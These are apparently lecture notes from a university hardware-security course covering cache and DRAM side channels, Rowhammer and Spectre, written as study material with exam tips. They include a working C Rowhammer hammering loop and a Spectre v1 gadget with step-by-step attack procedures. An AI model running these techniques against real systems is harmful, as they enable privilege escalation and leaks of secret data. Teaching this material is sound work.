
Hardware Security

L18 (Post-Midterm)

Side channel attacks and hardware vulnerabilities

Topics Covered

  • Side channel attacks overview
  • Cache side channels (Prime+Probe, Flush+Reload)
  • Memory side channels (DRAMA)
  • Rowhammer
  • Spectre & Meltdown
  • Branch predictor side channels
01

Side Channel Attacks Overview

A side channel is an unintended information leakage path that does not use the normal input/output interface of a system.

Characteristics:

  • Non-invasive: Does not require physical modification of the hardware
  • Stealthy: Hard to detect — the attacker uses normal instructions
  • Hard to fix: The leakage is inherent in how hardware optimizations work (caches, branch predictors, etc.)
  • Exploits shared resources between attacker and victim

Common side channels in hardware:

  • Timing: Measure how long an operation takes (cache hit vs. miss, branch prediction hit vs. miss)
  • Power: Measure power consumption patterns (different instructions consume different power)
  • Electromagnetic: Measure EM emissions from the chip

In CS 450, we focus on timing-based microarchitectural side channels — specifically cache and memory side channels.

Key Points

  • Side channel = unintended information leakage, not through normal I/O
  • Non-invasive, stealthy, hard to fix — inherent in hardware optimizations
  • Exploits shared resources (caches, memory, branch predictors)
  • Timing-based: measure cache hit/miss or DRAM row buffer hit/miss latency
02

Cache Side Channels: Prime+Probe & Flush+Reload

Cache side channels exploit the fact that cache hit/miss timing is observable and depends on what the victim has accessed.

General procedure:

  1. Set cache to a known state
  2. Wait for victim to execute
  3. Check what changed in the cache (via timing)

Prime+Probe:

  1. Prime: Attacker fills specific cache sets with their own data (accesses enough addresses to fill every way in target sets)
  2. Wait: Victim runs and potentially evicts some of the attacker's data
  3. Probe: Attacker re-accesses their data and times each access. If an access is slow (cache miss), the victim must have accessed that set → information leaked!

Flush+Reload: (requires shared memory, e.g., shared libraries)

  1. Flush: Attacker uses clflush to evict a shared cache line
  2. Wait: Victim runs
  3. Reload: Attacker accesses the same line and times it. If fast (cache hit), the victim accessed it. If slow (miss), the victim didn't.

Flush+Reload has higher resolution (per cache line vs. per set) but requires shared memory pages.

Key Points

  • Cache side channels: hit/miss timing reveals victim access patterns
  • Prime+Probe: fill sets → wait → re-access and time (slow = victim used that set)
  • Flush+Reload: flush shared line → wait → reload and time (fast = victim used it)
  • Flush+Reload has finer granularity but requires shared memory
⚠️

Exam Tip

Be able to describe the 3 steps of each attack. Know the difference: Prime+Probe works without shared memory, Flush+Reload needs it but is more precise.

03

Memory Side Channels (DRAMA)

The DRAMA attack exploits DRAM row buffer timing as a side channel:

  • A row buffer hit is faster than a row buffer miss/conflict
  • If the attacker and victim share a DRAM bank, the attacker can detect which row the victim accessed by observing row buffer hit/miss timing

Attack procedure:

  1. Attacker accesses an address that maps to a specific bank and row (opens that row)
  2. Victim accesses memory
  3. Attacker re-accesses the same address. If fast (row hit), the victim did NOT access a different row in that bank. If slow (row conflict), the victim accessed a different row in the same bank → leaked info.

This is harder to mitigate than cache side channels: there is no instruction to "flush" a row buffer, and the row buffer is fundamental to how DRAM operates.

Key Points

  • DRAMA: row buffer hit/miss timing leaks which DRAM rows were accessed
  • Requires attacker and victim to share a DRAM bank
  • Row hit (fast) = victim didn't change the row; row conflict (slow) = victim used different row
  • Harder to mitigate than cache side channels — row buffer is fundamental to DRAM
04

Rowhammer

Rowhammer is a hardware vulnerability where repeatedly activating (hammering) a DRAM row causes bit flips in adjacent rows.

Mechanism:

  • When a row is activated, the electrical disturbance affects neighboring rows
  • A single activation causes negligible disturbance, but thousands of rapid activations (within a refresh interval) can cause enough charge leakage in adjacent cells to flip bits
  • The hammered row is called the aggressor row; the neighboring row that suffers bit flips is the victim row
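The hammering loop itself is short. This sketch assumes x86 (clflush) and two hypothetical aggressor addresses, `a1` and `a2`, lying in different rows of the same bank and adjacent to the victim row; finding such addresses requires knowledge of the DRAM address mapping. Alternating between two rows in one bank forces the bank to close one row and re-activate the other on every pair of accesses, and the clflush ensures each access reaches DRAM instead of hitting in the cache.

```c
#include <stdint.h>
#include <emmintrin.h>   // _mm_clflush (x86)

// Hammer two aggressor addresses in different rows of the same bank.
// Returns the approximate number of row activations issued.
int hammer(volatile uint8_t *a1, volatile uint8_t *a2, int rounds) {
    for (int i = 0; i < rounds; i++) {
        (void)*a1;                            // activate a1's row
        (void)*a2;                            // close it, activate a2's row
        _mm_clflush((const void *)a1);        // evict so the next
        _mm_clflush((const void *)a2);        // iteration reaches DRAM
    }
    return 2 * rounds;
}
```

Hundreds of thousands of activations within one refresh interval are typically needed before adjacent cells leak enough charge to flip.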

Why it's dangerous:

  • An unprivileged user program can flip bits in memory it does NOT own
  • Can flip bits in page tables → privilege escalation
  • Can flip bits in other processes' data → data corruption
  • Demonstrated: user-level program gaining kernel privileges by flipping page table bits

Root cause: Electromagnetic interference between adjacent DRAM rows, worsened by smaller cell sizes and tighter row spacing in modern DRAM.

Mitigations: Increased refresh rate (but costs energy/performance), targeted row refresh (refresh victim rows when aggressor is hammered), ECC (but multi-bit flips can bypass it).

Key Points

  • Repeated activation of aggressor row causes bit flips in adjacent victim rows
  • Electromagnetic interference between tightly packed DRAM rows
  • Can be exploited for privilege escalation (flip page table bits)
  • Worsens with smaller process technology (tighter spacing)
  • Mitigations: faster refresh, targeted refresh, ECC (limited)
⚠️

Exam Tip

Know the mechanism (repeated row activation → adjacent row bit flips) and why it enables security attacks (flip bits you don't own, e.g., page table entries).

05

Spectre

Spectre exploits speculative execution combined with a cache side channel to leak secret data.

Key insight: When the CPU speculatively executes instructions down a mispredicted path, those instructions can access secret data. Even though the architectural results are rolled back, the cache state changes persist (cache is not rolled back on a squash).

Spectre v1 (Bounds Check Bypass) — simplified:

if (x < array1_size) {           // attacker trained this branch to predict "taken"
    y = array2[array1[x] * 256]; // speculatively executed with out-of-bounds x
}
  1. Attacker trains the branch predictor to predict "taken"
  2. Attacker provides a malicious x that is out-of-bounds (reads secret data from array1[x])
  3. The speculative load array2[secret * 256] brings a cache line into the cache that depends on the secret value
  4. Even after the branch resolves and speculative results are squashed, the cache line remains
  5. Attacker uses Flush+Reload or Prime+Probe on array2 to determine which cache line was loaded → reveals the secret value

Why it's hard to fix: Speculative execution is fundamental to performance. Preventing all speculative side effects would severely degrade performance.

Key Points

  • Speculative execution + cache side channel = leak secret data
  • Speculative instructions modify cache state, which is NOT rolled back
  • Attacker trains branch predictor, provides out-of-bounds index, reads secret speculatively
  • Secret value encoded in cache state, extracted via Flush+Reload or Prime+Probe
  • Hard to fix: speculative execution is critical for performance
⚠️

Exam Tip

Understand the two key components: (1) speculative execution accesses secret data, (2) cache side channel extracts the secret. Know why the cache is not rolled back.
